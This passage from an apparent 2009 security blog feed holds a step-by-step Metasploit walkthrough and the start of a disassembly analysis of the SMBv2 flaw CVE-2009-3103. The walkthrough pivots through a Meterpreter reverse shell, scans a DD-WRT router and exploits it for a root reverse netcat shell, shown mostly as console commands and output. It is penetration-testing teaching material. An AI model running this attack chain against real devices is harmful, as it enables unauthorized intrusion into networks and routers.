<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">6.</td>
<td width="1146" valign="top">Hit Apply;  and now you’ll see the Metasploit user has been added and a member of  Administrators and Users</td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-190" title="8" src="http://themikefiles.wordpress.com/files/2009/10/8.jpg?w=497&#038;h=362" alt="8" width="497" height="362" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"><img class="alignnone size-full wp-image-191" title="9" src="http://themikefiles.wordpress.com/files/2009/10/9.jpg?w=496&#038;h=263" alt="9" width="496" height="263" /></td>
</tr>
<tr>
<td width="25" valign="top"></td>
<td width="1146" valign="top"></td>
</tr>
<tr>
<td width="25" valign="top">7.</td>
<td width="1146" valign="top">Hope this is  straight-forward enough and I’m able to share the power of Metasploit.  Kudos to Metasploit Team!</td>
</tr>
</tbody>
</table>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Using Metasploit DD-WRT Exploit Module Thru Pivot]]></title>
<link>http://longjidin.wordpress.com/2009/10/11/using-metasploit-dd-wrt-exploit-module-thru-pivot/</link>
<pubDate>Sun, 11 Oct 2009 10:29:20 +0000</pubDate>
<dc:creator>longjidin</dc:creator>
<guid>http://longjidin.wordpress.com/2009/10/11/using-metasploit-dd-wrt-exploit-module-thru-pivot/</guid>
<description><![CDATA[Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the  HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it.  In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:</p>
<pre style="border:1px solid #cecece;overflow:auto;background-color:#fbfbfb;min-height:40px;width:650px;padding:5px;">
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf &#62; ifconfig eth0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] <span style="color:#00008b;">exec</span>: ifconfig eth0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          collisions:0 txqueuelen:1000</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">          <a style="color:#ff0000;" href="http://www.ruby-doc.org/docs/rdoc/1.9/classes/Interrupt.html">Interrupt</a>:20</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf &#62; <strong>use exploit/multi/handler</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>set PAYLOAD windows/meterpreter/reverse_tcp</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">PAYLOAD =&#62; windows/meterpreter/reverse_tcp</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>set LHOST 192.168.1.158</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">LHOST =&#62; 192.168.1.158</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>set ExitOnSession <span style="color:#0000ff;">false</span></strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">ExitOnSession =&#62; <span style="color:#0000ff;">false</span></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>exploit -j -z</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Exploit running as background job.</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Handler <span style="color:#00008b;">binding</span> to LHOST 0.0.0.0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Started reverse handler</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Starting the payload handler...</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Transmitting intermediate stager <span style="color:#0000ff;">for</span> over-sized stage...(216 bytes)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Sending stage (718336 bytes)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Meterpreter session 1 opened (192.168.1.158:4444 -&#62; 192.168.1.100:1085)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; session -i 1</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[-] Unknown command: session.</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; sessions -i 1</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Starting interaction with 1...</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">meterpreter &#62; <strong>sysinfo </strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Computer: AWINXP01</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">OS      : Windows XP (Build 2600, Service Pack 2).</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">meterpreter &#62; <strong>execute -H -f -c -i -f cmd.exe</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Process 1708 created.</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Channel 1 created.</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Microsoft Windows XP [Version 5.1.2600]</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">(C) Copyright 1985-2001 Microsoft Corp.</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">C:\Documents <span style="color:#0000ff;">and</span> Settings\administrator\Desktop&#62;ipconfig</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">ipconfig</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Windows IP Configuration</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Ethernet adapter Local Area Connection:</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">        Connection-specific DNS Suffix  . :</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">        IP Address. . . . . . . . . . . . : 192.168.111.200</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">        Subnet Mask . . . . . . . . . . . : 255.255.255.0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">        Default Gateway . . . . . . . . . : 192.168.111.2</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">C:\Documents <span style="color:#0000ff;">and</span> Settings\administrator\Desktop&#62;<span style="color:#00008b;">exit</span></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">meterpreter &#62;</pre>
</pre>
<p>Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:</p>
<pre style="border:1px solid #cecece;overflow:auto;background-color:#fbfbfb;min-height:40px;width:650px;padding:5px;">
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">meterpreter &#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Background session 1? [y/N]</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>route add 192.168.111.0 255.255.255.0 1</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>route <span style="color:#00008b;">print</span></strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Active Routing Table</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">====================</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">   Subnet             Netmask            Gateway</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">   ------             -------            -------</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">   192.168.111.0      255.255.255.0      Session 1</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62;</pre>
</pre>
<p>Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:</p>
<pre style="border:1px solid #cecece;overflow:auto;background-color:#fbfbfb;min-height:40px;width:650px;padding:5px;">
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>use auxiliary/scanner/portscan/tcp</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf auxiliary(tcp) &#62; <strong>info</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">       Name: TCP Port Scanner</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">    Version: 6823</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">    License: Metasploit Framework License (BSD)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Provided by:</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  hdm &#60;hdm@metasploit.com&#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  kris katterjohn &#60;katterjohn@gmail.com&#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Basic options:</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  Name     Current Setting  Required  Description</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  ----     ---------------  --------  -----------</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  RHOSTS                    yes       The target address range <span style="color:#0000ff;">or</span> CIDR identifier</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  THREADS  1                yes       The number of concurrent threads</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  TIMEOUT  1000             yes       The socket connect timeout <span style="color:#0000ff;">in</span> milliseconds</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Description:</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">  Enumerate <span style="color:#00008b;">open</span> TCP services</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf auxiliary(tcp) &#62; set PORTS 22,23,80,443</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">PORTS =&#62; 22,23,80,443</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf auxiliary(tcp) &#62; set RHOSTS 192.168.111.2</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">RHOSTS =&#62; 192.168.111.2</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf auxiliary(tcp) &#62; run</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*]  TCP OPEN 192.168.111.2:22</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*]  TCP OPEN 192.168.111.2:23</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*]  TCP OPEN 192.168.111.2:80</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Auxiliary <span style="color:#0000ff;">module</span> execution completed</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62;</pre>
</pre>
<p>Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the <strong><em>connect</em></strong> command in Metasploit:</p>
<pre style="border:1px solid #cecece;overflow:auto;background-color:#fbfbfb;min-height:40px;width:650px;padding:5px;">
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>connect -c 1 192.168.111.2 23</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Connected to 192.168.111.2:23</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">DD-WRT v24 std (c) 2007 NewMedia-NET GmbH</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Release: 01/26/07 (SVN revision: 5660M)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">�</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">DD-WRTx86CI login: ^Cmsf exploit(handler) &#62;</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62;</pre>
</pre>
<p>As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux <em><strong>uname</strong></em> command to check the version of the device and to also check the shell is working:</p>
<pre style="border:1px solid #cecece;overflow:auto;background-color:#fbfbfb;min-height:40px;width:650px;padding:5px;">
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(handler) &#62; <strong>use exploit/linux/http/ddwrt_cgibin_exec</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(ddwrt_cgibin_exec) &#62; <strong>set PAYLOAD cmd/unix/reverse_netcat</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">PAYLOAD =&#62; cmd/unix/reverse_netcat</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(ddwrt_cgibin_exec) &#62; <strong>set LPORT 2222</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">LPORT =&#62; 2222</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(ddwrt_cgibin_exec) &#62; <strong>set RHOST 192.168.111.2</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">RHOST =&#62; 192.168.111.2</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(ddwrt_cgibin_exec) &#62; <strong>set LHOST 192.168.1.158</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">LHOST =&#62; 192.168.1.158</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">msf exploit(ddwrt_cgibin_exec) &#62; <strong>exploit</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Handler <span style="color:#00008b;">binding</span> to LHOST 0.0.0.0</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Started reverse handler</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Sending GET request with encoded command line...</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">[*] Command shell session 2 opened (192.168.1.158:2222 -&#62; 192.168.1.100:4531)</pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;"><strong>uname -a</strong></pre>
<pre style="background-color:#fbfbfb;width:100%;font-family:consolas,'Courier New',courier,monospace;font-size:12px;margin:0;">Linux DD-WRTx86CI 2.6.19.2dd-wrt <span style="color:#008000;">#45 Fri Jan 26 06:28:01 CET 2007 i686 unknown</span></pre>
</pre>
<p>One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.</p>
<p>For more information on this vulnerability please check the following links:</p>
<p><a href="http://www.securityfocus.com/bid/35742">http://www.securityfocus.com/bid/35742</a><br />
<a title="http://www.milw0rm.com/exploits/9209" href="http://www.milw0rm.com/exploits/9209">http://www.milw0rm.com/exploits/9209</a></p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Static Binary Analysis of Recent SMBv2 Vulnerability]]></title>
<link>http://longjidin.wordpress.com/2009/10/09/static-binary-analysis-of-recent-smbv2-vulnerability/</link>
<pubDate>Fri, 09 Oct 2009 01:52:40 +0000</pubDate>
<dc:creator>longjidin</dc:creator>
<guid>http://longjidin.wordpress.com/2009/10/09/static-binary-analysis-of-recent-smbv2-vulnerability/</guid>
<description><![CDATA[The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><div id="content" class="dynacloud">The recent <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103">SMBv2 vulnerability (CVE-2009-3103)  in Microsoft Windows</a> has gotten a lot of attention in the past few weeks.    We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis.   With the release of <a href="http://harmonysecurity.com/">Stephen Fewer&#8217;s</a> <a href="http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/smb/smb2_negotiate_func_index.rb">Metasploit module</a> to exploit this vulnerability, technical details of the vulnerability are now publicly available.Our analysis was limited to static binary analysis of srv2.sys and srvnet.sys.</p>
<p>The crash occurs within Smb2ValidateProviderCallback(PVOID DestinationBuffer):</p>
<pre>.text:00017745</pre>
<pre>.text:00017745 loc_17745:</pre>
<pre>.text:00017745 movzx   eax, word ptr [esi+0Ch]</pre>
<pre>.text:00017749 mov     eax, _ValidateRoutines[eax*4]</pre>
<pre>.text:00017750 test    eax, eax</pre>
<pre>.text:00017752 jnz     short loc_1775B</pre>
<p>This code is accessing an array of function pointers using a user-supplied index.  This function pointer is then called here:</p>
<pre>.text:0001775B</pre>
<pre>.text:0001775B loc_1775B:</pre>
<pre>.text:0001775B push    ebx</pre>
<pre>.text:0001775C call    eax ; Smb2ValidateNegotiate(x) ; Smb2ValidateNegotiate</pre>
<p>The table consists of 19 function pointers, which seem to validate requests prior to actually executing them.</p>
<pre>.data:0002D270 _ValidateRoutines dd offset _Smb2ValidateNegotiate@4</pre>
<pre>.data:0002D270                                         ; DATA XREF: Smb2ValidateProviderCallback(x)+4EA r</pre>
<pre>.data:0002D270                                         ; Smb2ValidateNegotiate(x)</pre>
<pre>.data:0002D274                 dd offset _Smb2ValidateSessionSetup@4 ; Smb2ValidateSessionSetup(x)</pre>
<pre>.data:0002D278                 dd offset _Smb2ValidateLogoff@4 ; Smb2ValidateLogoff(x)</pre>
<pre>.data:0002D27C                 dd offset _Smb2ValidateTreeConnect@4 ; Smb2ValidateTreeConnect(x)</pre>
<pre>.data:0002D280                 dd offset _Smb2ValidateTreeDisconnect@4 ; Smb2ValidateTreeDisconnect(x)</pre>
<pre>.data:0002D284                 dd offset _Smb2ValidateCreate@4 ; Smb2ValidateCreate(x)</pre>
<pre>.data:0002D288                 dd offset _Smb2ValidateClose@4 ; Smb2ValidateClose(x)</pre>
<pre>.data:0002D28C                 dd offset _Smb2ValidateFlush@4 ; Smb2ValidateFlush(x)</pre>
<pre>.data:0002D290                 dd offset _Smb2ValidateRead@4 ; Smb2ValidateRead(x)</pre>
<pre>.data:0002D294                 dd offset _Smb2ValidateWrite@4 ; Smb2ValidateWrite(x)</pre>
<pre>.data:0002D298                 dd offset _Smb2ValidateLock@4 ; Smb2ValidateLock(x)</pre>
<pre>.data:0002D29C                 dd offset _Smb2ValidateIoctl@4 ; Smb2ValidateIoctl(x)</pre>
<pre>.data:0002D2A0                 dd offset _Smb2ValidateCancel@4 ; Smb2ValidateCancel(x)</pre>
<pre>.data:0002D2A4                 dd offset _Smb2ValidateEcho@4 ; Smb2ValidateEcho(x)</pre>
<pre>.data:0002D2A8                 dd offset _Smb2ValidateQueryDirectory@4 ; Smb2ValidateQueryDirectory(x)</pre>
<pre>.data:0002D2AC                 dd offset _Smb2ValidateChangeNotify@4 ; Smb2ValidateChangeNotify(x)</pre>
<pre>.data:0002D2B0                 dd offset _Smb2ValidateQueryInfo@4 ; Smb2ValidateQueryInfo(x)</pre>
<pre>.data:0002D2B4                 dd offset _Smb2ValidateSetInfo@4 ; Smb2ValidateSetInfo(x)</pre>
<pre>.data:0002D2B8                 dd offset _Smb2ValidateOplockBreak@4 ; Smb2ValidateOplockBreak(x)</pre>
<p>When the driver is first loaded, it initializes a series of structures that are responsible for registering the driver.  One of the first steps that occurs is registering a series of callbacks:</p>
<pre>PAGE:0002EFCF push    offset _SrvNetProvider</pre>
<pre>PAGE:0002EFD4 lea     eax, [ebp+DestinationString]</pre>
<pre>PAGE:0002EFD7 push    eax</pre>
<pre>PAGE:0002EFD8 mov     [ebp+var_14], offset _SrvConnectHandler@16 ; SrvConnectHandler(x,x,x,x)</pre>
<pre>PAGE:0002EFDF mov     [ebp+var_C], offset _SrvDisconnectHandler@12 ; SrvDisconnectHandler(x,x,x)</pre>
<pre>PAGE:0002EFE6 mov     [ebp+var_10], offset _SrvReceiveHandler@36 ; SrvReceiveHandler(x,x,x,x,x,x,x,x,x)</pre>
<pre>PAGE:0002EFED mov     [ebp+var_18], offset _SrvNegotiateHandler@16 ; SrvNegotiateHandler(x,x,x,x)</pre>
<pre>PAGE:0002EFF4 mov     [ebp+var_20], offset _SrvRegisterEndpoint@28 ; SrvRegisterEndpoint(x,x,x,x,x,x,x)</pre>
<pre>PAGE:0002EFFB mov     [ebp+var_1C], offset _SrvDeregisterEndpoint@12 ; SrvDeregisterEndpoint(x,x,x)</pre>
<pre>PAGE:0002F002 mov     [ebp+var_8], offset _SrvCredentialHandler@16 ; SrvCredentialHandler(x,x,x,x)</pre>
<pre>PAGE:0002F009 call    _SrvNetRegisterClient@8 ; SrvNetRegisterClient(x,x)</pre>
<p>srvnet.sys is another driver that exports the SrvNetRegisterClient() routine.  The srvnet.sys routine modifies a device extension (http://msdn.microsoft.com/en-us/library/ms794734.aspx), which maintains some internal state on each driver that registers via SrvNetRegisterClient().  This object is allocated with a size of 0&#215;160 bytes when srvnet.sys is loaded (From DriverLoad()):</p>
<pre>INIT:00028180</pre>
<pre>INIT:00028180 loc_28180:</pre>
<pre>INIT:00028180 lea     eax, [ebp+DeviceObject]</pre>
<pre>INIT:00028183 push    eax             ; DeviceObject</pre>
<pre>INIT:00028184 push    0               ; Exclusive</pre>
<pre>INIT:00028186 push    100h            ; DeviceCharacteristics</pre>
<pre>INIT:0002818B push    14h             ; DeviceType</pre>
<pre>INIT:0002818D lea     eax, [ebp+DestinationString]</pre>
<pre>INIT:00028190 push    eax             ; DeviceName</pre>
<pre>INIT:00028191 push    160h            ; DeviceExtensionSize</pre>
<pre>INIT:00028196 push    [ebp+DriverObject] ; DriverObject</pre>
<pre>INIT:00028199 call    ds:__imp__IoCreateDevice@28 ; IoCreateDevice(x,x,x,x,x,x,x)</pre>
<pre>INIT:0002819F mov     esi, eax</pre>
<pre>INIT:000281A1 test    esi, esi</pre>
<pre>INIT:000281A3 jge     short loc_281DF</pre>
<pre>INIT:000281FD mov     eax, [ebp+DeviceObject]</pre>
<pre>INIT:00028200 mov     eax, [eax+DEVICE_OBJECT.DeviceExtension]</pre>
<pre>INIT:00028203 push    eax             ; Resource</pre>
<pre>INIT:00028204 mov     _SrvNetDeviceExtension, eax ; Store ptr to DeviceExtension in a global variable</pre>
